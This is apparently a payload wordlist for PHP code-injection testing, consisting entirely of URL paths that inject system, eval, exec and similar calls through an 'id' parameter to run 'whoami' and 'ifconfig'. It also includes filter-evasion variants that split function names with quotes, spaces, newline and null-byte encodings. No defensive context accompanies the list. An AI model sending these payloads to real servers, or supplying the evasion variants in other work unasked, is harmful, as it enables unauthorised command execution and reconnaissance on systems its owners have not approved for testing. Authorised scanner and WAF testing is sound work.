/index.php?id=system('whoami')
/index.php?id=eval('whoami')
/index.php?id=exec('whoami')
/index.php?id=getruntime('whoami')
/index.php?id=preg_replace('whoami')
/index.php?id=system('ifconfig')
/index.php?id=eval('ifconfig')
/index.php?id=exec('ifconfig')
/index.php?id=getruntime('ifconfig')
/index.php?id=preg_replace('ifconfig')
/index.php?id=sys''tem('whoami')
/index.php?id=ev al('whoami')
/index.php?id=ex%0aec('whoami')
/index.php?id=getr%00untime('whoami')
/index.php?id=pre g_rep lace('whoami')
/index.php?id=syst''em('ifconfig')
/index.php?id=ev""al('ifconfig')
/index.php?id=ex ec('ifconfig')
/index.php?id=get%0aruntime('ifconfig')
/index.php?id=preg_re%00place('ifconfig')
